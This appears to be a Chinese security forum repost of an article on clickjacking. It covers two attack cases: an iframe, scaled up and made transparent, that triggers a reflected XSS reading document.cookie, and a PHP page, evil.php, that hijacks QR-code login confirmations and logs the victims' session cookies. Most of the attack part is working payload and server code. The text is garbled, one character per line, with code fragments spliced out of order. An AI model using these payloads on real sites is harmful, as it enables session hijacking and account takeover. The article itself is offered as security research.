论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
Web安全
[15795] 2020-08-31_关于Web点击劫持的一些实例
文档创建者:
s7ckTeam
浏览次数:
1
最后更新:
2025-01-18
Web安全
1 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2020-08-31_关于Web点击劫持的一些实例
关
于
W
e
b
点
击
劫
持
的
一
些
实
例
原
创
l
s
a
m
c
h
n
F
r
e
e
B
u
f
2
0
2
0
-
0
8
-
3
1
相
信
很
多
朋
友
都
对
点
击
劫
持
有
所
耳
闻
,
它
一
直
都
存
在
但
又
不
受
到
重
视
。
然
而
在
某
些
情
况
下
,
点
击
劫
持
可
以
发
挥
出
不
一
的
威
力
。
笔
者
在
这
里
分
享
两
个
实
际
的
例
子
,
希
望
能
起
到
抛
砖
引
玉
的
作
用
。
一
一
.
点
击
劫
持
点
击
劫
持
+
需
要
交
互
的
需
要
交
互
的
X
S
S
某
日
寻
到
一
个
反
射
型
x
s
s
,
它
是
这
样
的
:
h
t
t
p
s
:
/
/
w
w
w
.
x
x
x
.
c
o
m
/
a
a
a
?
r
e
t
u
r
n
U
r
l
=
j
a
v
a
s
c
r
i
p
t
:
(
a
l
e
r
t
)
(
)
/
/
很
遗
憾
的
是
,
这
个
X
S
S
的
触
发
条
件
有
些
复
杂
,
不
仅
需
要
打
开
链
接
,
还
需
要
点
击
左
上
角
的
返
回
按
钮
才
会
触
发
。
但
是
谁
会
这
么
傻
,
点
开
这
个
链
接
发
现
不
对
劲
后
,
再
点
左
上
角
的
1
6
p
x
*
1
5
p
x
的
小
按
钮
退
出
页
面
啊
。
。
于
是
今
天
的
主
角
上
场
。
在
我
们
的
恶
意
网
页
中
,
用
i
f
r
a
m
e
加
载
此
X
S
S
链
接
,
再
用
c
s
s
把
i
f
r
a
m
e
放
大
1
0
0
倍
。
此
时
可
以
看
到
左
上
角
的
按
钮
覆
盖
到
了
整
个
页
面
,
当
点
击
页
面
任
意
位
置
触
发
X
S
S
。
<
s
t
y
l
e
>
i
f
r
a
m
e
{
p
o
s
i
t
i
o
n
:
f
i
x
e
d
;
/
*
绝
对
定
位
*
/
t
o
p
:
c
a
l
c
(
-
1
3
p
x
*
1
0
0
)
;
l
e
f
t
:
c
a
l
c
(
-
2
0
p
x
*
1
0
0
)
;
/
*
按
钮
左
上
各
有
2
0
p
x
、
1
3
p
x
空
隙
,
此
举
使
按
钮
出
现
在
左
上
角
*
/
t
r
a
n
s
f
o
r
m
-
o
r
i
g
i
n
:
0
0
0
;
/
*
放
大
中
心
设
为
左
上
角
*
/
t
r
a
n
s
f
o
r
m
:
s
c
a
l
e
(
1
0
0
)
;
/
*
放
大
1
0
0
倍
*
/
}
<
/
s
t
y
l
e
>
<
i
f
r
a
m
e
s
r
c
=
"
h
t
t
p
s
:
/
/
w
w
w
.
x
x
x
.
c
o
m
/
a
a
a
?
r
e
t
u
r
n
U
r
l
=
j
a
v
a
s
c
r
i
p
t
:
(
e
v
a
l
)
(
n
a
m
e
)
/
/
"
n
a
m
e
=
"
(
a
l
e
r
t
)
(
d
o
c
u
m
e
n
t
.
c
o
o
k
i
e
)
"
f
r
a
m
e
b
o
r
d
e
r
=
"
n
o
"
b
o
r
d
e
r
=
"
0
"
m
a
r
g
i
n
w
i
d
t
h
=
"
0
"
m
a
r
g
i
n
h
e
i
g
h
t
=
"
0
"
s
c
r
o
l
l
i
n
g
之
后
就
是
透
明
化
此
i
f
r
a
m
e
了
。
最
后
写
上
诱
导
点
击
的
部
分
就
行
了
。
P
S
.
实
际
利
用
过
程
,
可
以
根
据
情
况
变
通
。
如
:
一
个
页
面
需
要
先
点
按
钮
A
,
再
点
弹
框
按
钮
B
才
可
以
触
发
。
可
以
尝
试
变
换
i
f
r
a
m
e
大
小
,
使
两
个
按
钮
叠
加
在
一
起
,
之
后
再
用
C
S
S
放
大
i
f
r
a
m
e
2
0
0
倍
,
实
现
两
次
点
击
页
面
任
意
位
置
触
发
X
S
S
。
如
图
所
示
,
把
重
叠
部
分
左
上
角
对
齐
,
之
后
放
大
2
0
0
倍
。
两
次
点
击
页
面
任
意
位
置
触
发
X
S
S
。
二
二
.
点
击
劫
持
点
击
劫
持
+
二
维
码
登
录
二
维
码
登
录
某
日
留
意
到
X
网
站
网
页
端
可
以
扫
码
登
录
。
手
机
A
P
P
扫
码
后
,
打
开
一
个
页
面
(
u
r
l
-
A
)
,
点
击
确
认
后
网
页
端
即
可
登
录
。
而
且
没
做
点
击
劫
持
防
护
。
u
r
l
-
A
:
h
t
t
p
:
/
/
w
w
w
.
x
x
x
.
c
o
m
/
q
r
c
o
d
e
?
k
e
y
=
x
x
x
x
x
很
简
单
,
老
思
路
,
透
明
i
f
r
a
m
e
,
放
大
2
0
0
倍
。
【
服
务
端
】
e
v
i
l
.
p
h
p
从
二
维
码
登
录
接
口
获
得
登
录
u
r
l
-
A
、
k
e
y
,
用
i
f
r
a
m
e
包
含
u
r
l
-
A
发
给
别
人
,
制
造
点
击
劫
持
,
诱
导
他
点
击
。
【
用
户
端
】
当
用
户
打
开
e
v
i
l
.
p
h
p
,
被
诱
导
点
击
任
意
位
置
后
【
服
务
端
】
即
可
通
过
k
e
y
获
得
新
会
话
c
o
o
k
i
e
。
e
v
i
l
.
p
h
p
代
码
:
<
s
t
y
l
e
>
/
*
此
段
c
o
p
y
自
【
作
者
:
米
斯
特
安
全
攻
防
实
验
室
-
V
u
l
k
e
y
_
C
h
e
n
博
客
:
g
h
0
s
t
.
c
n
】
*
/
i
f
r
a
m
e
{
/
*
控
制
不
透
明
度
的
属
性
,
兼
容
各
大
浏
览
器
*
/
f
i
l
t
e
r
:
a
l
p
h
a
(
O
p
a
c
i
t
y
=
0
)
;
/
*
提
供
给
I
E
浏
览
器
8
之
前
的
*
/
-
m
o
z
-
o
p
a
c
i
t
y
:
0
;
/
*
提
供
给
火
狐
浏
览
器
的
*
/
-
w
e
b
k
i
t
-
o
p
a
c
i
t
y
:
0
;
/
*
提
供
给
w
e
b
k
i
t
内
核
的
*
/
-
k
h
t
m
l
-
o
p
a
c
i
t
y
:
0
;
/
*
提
供
给
K
H
T
M
L
内
核
的
*
/
-
m
s
-
f
i
l
t
e
r
:
"
p
r
o
g
i
d
:
D
X
I
m
a
g
e
T
r
a
n
s
f
o
r
m
.
M
i
c
r
o
s
o
f
t
.
A
l
p
h
a
(
O
p
a
c
i
t
y
=
0
)
"
;
/
*
提
供
给
I
E
8
之
后
的
*
/
o
p
a
c
i
t
y
:
0
;
/
*
控
制
不
透
明
度
的
属
性
,
兼
容
各
大
浏
览
器
*
/
}
<
/
s
t
y
l
e
>
<
s
t
y
l
e
>
i
f
r
a
m
e
{
p
o
s
i
t
i
o
n
:
f
i
x
e
d
;
/
*
绝
对
定
位
*
/
t
o
p
:
c
a
l
c
(
-
1
3
p
x
*
1
0
0
)
;
l
e
f
t
:
c
a
l
c
(
-
2
0
p
x
*
1
0
0
)
;
/
*
按
钮
左
上
各
有
2
0
p
x
、
1
3
p
x
空
隙
,
此
举
使
按
钮
出
现
在
左
上
角
*
/
t
r
a
n
s
f
o
r
m
-
o
r
i
g
i
n
:
0
0
<
?
p
h
p
$
k
e
y
=
$
_
R
E
Q
U
E
S
T
[
'
k
e
y
'
]
;
之
后
将
e
v
i
l
.
p
h
p
的
链
接
发
到
A
P
P
内
显
眼
的
地
方
。
当
别
人
被
吸
引
打
开
此
链
接
并
点
击
页
面
任
意
区
域
,
我
们
即
可
获
得
他
的
新
会
话
c
o
o
k
i
e
。
e
v
i
l
.
p
h
p
实
际
上
充
当
了
二
维
码
登
录
的
中
间
人
,
要
防
范
此
类
攻
击
,
确
认
登
录
页
面
需
要
防
护
点
击
劫
持
。
三
三
.
全
文
总
结
全
文
总
结
1
.
C
S
S
放
大
i
f
r
a
m
e
2
0
0
倍
覆
盖
网
页
,
是
点
击
劫
持
的
好
方
案
。
2
.
分
享
了
一
些
实
例
。
精
彩
推
荐
精
彩
推
荐
i
f
(
!
$
k
e
y
)
{
/
/
当
$
k
e
y
为
空
,
系
第
一
次
调
用
,
输
出
点
击
劫
持
h
t
m
l
/
/
从
二
维
码
登
录
接
口
获
取
登
录
j
s
o
n
$
c
h
=
c
u
r
l
_
i
n
i
t
(
)
;
$
u
r
l
=
'
h
t
t
p
s
:
/
/
w
w
w
.
x
x
x
.
c
o
m
/
g
e
t
L
o
g
i
n
U
r
l
'
;
c
u
r
l
_
s
e
t
o
p
t
(
$
c
h
,
C
U
R
L
O
P
T
_
U
R
L
,
$
u
r
l
)
;
c
u
r
l
_
s
e
t
o
p
t
(
$
c
h
,
C
U
R
L
O
P
T
_
R
E
T
U
R
N
T
R
A
N
S
F
E
R
,
1
)
;
c
u
r
l
_
s
e
t
o
p
t
(
$
c
h
,
C
U
R
L
O
P
T
_
H
T
T
P
G
E
T
,
1
)
;
$
o
=
c
u
r
l
_
e
x
e
c
(
$
c
h
)
;
c
u
r
l
_
c
l
o
s
e
(
$
c
h
)
;
/
/
解
析
j
s
o
n
,
获
得
登
录
u
r
l
、
o
a
u
t
h
K
e
y
$
j
s
o
n
=
j
s
o
n
_
d
e
c
o
d
e
(
$
o
,
t
r
u
e
)
;
$
k
e
y
=
$
j
s
o
n
[
'
d
a
t
a
'
]
[
'
o
a
u
t
h
K
e
y
'
]
;
$
u
r
l
=
$
j
s
o
n
[
'
d
a
t
a
'
]
[
'
u
r
l
'
]
;
/
/
输
出
点
击
劫
持
h
t
m
l
e
c
h
o
s
p
r
i
n
t
f
(
'
<
h
t
m
l
>
<
h
e
a
d
>
<
/
h
e
a
d
>
<
b
o
d
y
h
e
i
g
h
t
=
1
0
0
%
%
w
i
d
t
h
=
1
0
0
%
%
>
<
d
i
v
>
<
i
f
r
a
m
e
>
<
/
i
f
r
a
m
e
>
<
/
d
i
v
>
<
s
c
r
i
p
t
>
f
u
n
c
t
i
o
n
c
h
e
c
k
(
)
{
d
o
c
u
m
e
n
t
.
b
o
d
y
.
a
p
p
e
n
d
C
h
i
l
d
(
d
o
c
u
m
e
n
t
.
c
r
e
a
t
e
E
l
e
m
e
n
t
(
"
i
m
g
"
)
)
.
+
M
a
t
h
.
r
a
n
d
o
m
(
)
;
}
s
e
t
I
n
t
e
r
v
a
l
(
"
c
h
e
c
k
(
)
"
,
1
0
0
0
)
;
<
/
s
c
r
i
p
t
>
<
/
b
o
d
y
>
<
/
h
t
m
l
>
'
,
$
u
r
l
,
$
k
e
y
)
;
}
e
l
s
e
{
/
/
当
$
k
e
y
不
为
空
,
系
二
次
调
用
,
记
录
成
功
登
录
的
c
o
o
k
i
e
/
/
判
断
o
a
u
t
h
K
e
y
对
应
的
u
r
l
是
否
登
录
(
被
点
击
)
$
c
h
=
c
u
r
l
_
i
n
i
t
(
)
;
$
u
r
l
=
'
h
t
t
p
s
:
/
/
w
w
w
.
x
x
x
.
c
o
m
/
g
e
t
L
o
g
i
n
I
n
f
o
'
;
c
u
r
l
_
s
e
t
o
p
t
(
$
c
h
,
C
U
R
L
O
P
T
_
U
R
L
,
$
u
r
l
)
;
c
u
r
l
_
s
e
t
o
p
t
(
$
c
h
,
C
U
R
L
O
P
T
_
R
E
T
U
R
N
T
R
A
N
S
F
E
R
,
1
)
;
c
u
r
l
_
s
e
t
o
p
t
(
$
c
h
,
C
U
R
L
O
P
T
_
H
T
T
P
G
E
T
,
0
)
;
c
u
r
l
_
s
e
t
o
p
t
(
$
c
h
,
C
U
R
L
O
P
T
_
H
E
A
D
E
R
,
t
r
u
e
)
;
c
u
r
l
_
s
e
t
o
p
t
(
$
c
h
,
C
U
R
L
O
P
T
_
P
O
S
T
F
I
E
L
D
S
,
'
o
a
u
t
h
K
e
y
=
'
.
$
k
e
y
)
;
$
o
=
c
u
r
l
_
e
x
e
c
(
$
c
h
)
;
c
u
r
l
_
c
l
o
s
e
(
$
c
h
)
;
/
/
记
录
日
志
$
m
s
g
=
'
<
t
i
m
e
>
'
.
d
a
t
e
(
"
Y
-
m
-
d
H
:
i
:
s
"
)
.
'
<
/
t
i
m
e
>
<
k
e
y
>
'
.
$
k
e
y
.
'
<
/
k
e
y
>
<
d
a
t
a
>
'
.
$
o
.
'
<
/
d
a
t
a
>
'
.
P
H
P
_
E
O
L
;
/
/
通
过
返
回
包
是
否
含
有
S
e
t
-
C
o
o
k
i
e
判
断
是
否
登
录
/
/
如
果
登
录
成
功
写
入
l
o
g
.
t
x
t
i
f
(
s
t
r
p
o
s
(
$
o
,
'
S
e
t
-
C
o
o
k
i
e
'
,
0
)
)
f
i
l
e
_
p
u
t
_
c
o
n
t
e
n
t
s
(
"
l
o
g
.
t
x
t
"
,
$
m
s
g
,
F
I
L
E
_
A
P
P
E
N
D
)
;
}
?
>
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
Web安全